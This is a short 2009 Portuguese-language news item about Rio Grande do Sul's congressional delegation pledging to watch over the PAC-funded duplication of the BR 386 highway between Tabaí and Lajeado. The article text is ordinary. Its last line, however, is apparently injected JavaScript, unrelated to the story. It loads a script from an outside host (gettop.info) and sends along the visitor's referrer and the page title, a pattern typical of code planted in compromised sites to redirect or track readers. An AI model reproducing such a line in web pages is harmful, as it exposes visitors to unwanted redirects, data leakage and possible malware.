Bancada gaúcha ficará vigilante à duplicação de trecho da BR 386

Oct 13 2009
(0) Comments

[13/10/2009]

A importância econômica e para o desenvolvimento do Rio Grande do Sul das obras de duplicação da BR 386, entre os municípios gaúchos de Tabaí e Lajeado, é motivo suficiente para que sejam acompanhadas de perto pelos deputados federais e senadores. O tema foi tratado em reunião da bancada gaúcha na tarde desta terça-feira (13), em Brasília, coordenada pelo deputado federal Beto Albuquerque (PSB).

Com valor estimado em cerca de R$ 100 milhões, incluídos no PAC – Programa de Aceleração do Crescimento –, a obra na rodovia deve se iniciar no próximo ano. “Se está prevista no PAC recursos não podem faltar para esta obra. Vamos ficar vigilantes”, disse Albuquerque em nome dos companheiros de bancada aos prefeitos presentes.

Presidente da AMVAT – Associação dos Municípios do Vale do Taquari –, o prefeito de Fazenda Vilanova, José Luiz Cenci, relatou á bancada e aos demais participantes da reunião desta tarde os benefícios que uma obra como esta trará aos gaúchos de todo o Estado.

A BR 386 está contemplada no PAC com a destinação de recursos para a duplicação de 38 quilômetros da rodovia. A preocupação dos prefeitos, e que agora passará a ser acompanhada de perto pelos deputados federais e senadores, é de que o valor da largada das obras seja muito baixo e, se assim for, a obra não deslanche como deveria já em 2010.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;